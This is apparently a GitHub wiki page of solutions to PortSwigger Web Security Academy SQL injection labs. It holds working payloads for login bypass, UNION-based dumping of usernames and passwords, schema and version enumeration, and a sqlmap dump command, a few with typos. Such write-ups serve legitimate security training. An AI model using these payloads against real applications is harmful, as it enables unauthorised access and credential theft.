SQL injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

  • Solution

    1. Select a category.
    2. Test by adding a ' at the end. There is status code of 500 meaning internal error.
    3. Adding -- at the end of the query, resolves the internal error and nothing is displayed.
    4. Imagine an SQL query and modify it by finally adding a truthy value too, to the following. 
      ' OR 1=1 --

Apprentice lab:
SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

  • Solution

    1. Try login at wiener:peter
    2. Try login as administrator but with the ' appended. Notice the code 500 of internal error which hints an SQL query is taking place in server side.
    3. Username and password fields are combined to make an SQL query.
    4. Visual the query, add administrator in the username field and ' or 1=1 -- in the password field.

NOTE:
' Closes the string so we are able to tinker the query.
-- is added always in the end so we comment everything to the right side.
Truth value is added for the query logic. If something OR something that is always true like (1=1).

union-attacks

Practitioner lab:
SQL injection UNION attack, determining the number of columns returned by the query

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

  • Solution

    1. Select a category.
    2. Adding a ' causes an internal error.
    3. Use order by 1 to find out the number of columns.
    4. Then use the number before the error to use for null. 
      ' union select null, null, ..., null --

Practitioner lab:
SQL injection UNION attack, finding a column containing text

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

  • Solution

    1. Try order by to find out the number of columns.
    2. After that use union select null, null, null replacing each with a data type of interest.

Practitioner lab:
SQL injection UNION attack, retrieving data from other tables

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

  • Solution

    1. Select a category.
    2. Type ' union select username, password from users --.
    3. Log in as administrator.

Practitioner lab:
SQL injection UNION attack, retrieving multiple values in a single column

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

  • Solution

    1. Select a category and try ' -- to observe an internal error.
    2. Find out how many columns are they by using ' union select null from users --.
    3. After determine the data type of each column ' union select null 'a' from users --.
    4. z3nsh3ll has a nice explaination on how the final payload can be derived.
    5. Someone can use two payloads.
      1. For usernames
      ' union select null, username from users --
      1. For passwords
      ' union select null, password from users --
    6. Combining the two. 
      ' union selelct null, username || '-' || password from users --

examining-the-database

Practitioner lab:
SQL injection attack, querying the database type and version on MySQL and Microsoft

  • Solution

    1. Take care how # might get represented! url encoded it! Also for <space> 
      echo -n '#' | jq -sRr @uri
    2. Check number of columns with ' union select null,.. %23
    3. Get version. 
      ' union select null, @@version %23

Practitioner lab:
SQL injection attack, listing the database contents on non-Oracle databases

  • Solution

    1. Payload crafting: Finding out if injectable 
      '  --
    2. Payload crafting: Find out how many columns 
      ' union select, null null --
    3. Payload crafting: table_name from information_schema.tables. 
      ' union select null, table_name from information_schema.tables --
    4. Payload crafting: Control f users to find users table. Find out the columns now 
      ' union select null, column_name from information_schema.columns where table_name='users_ghghek'--
    5. Payload crafting: using the information revealed. 
      ' union select username_hsdiwb, password_beeklh from users_ghghek--

[NOTE]
When making an SQL query using SINGLE quotes not double.
Trying different both is encouraged though.

blind

Practitioner lab:
Blind SQL injection with conditional responses

  • Solution (sqlmap)

    1. Consulting HackTricks 
      sqlmap -u "https://uuid.web-security-academy.net/filter?category=Pets" --cookie "TrackingId=*" --dump

Practitioner lab:
Blind SQL injection with out-of-band interaction (Pro)

Practitioner lab:
Blind SQL injection with out-of-band data exfiltration (Pro)

Tip

When crafting payloads, portswigger's cheat sheet can be used as reference.

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️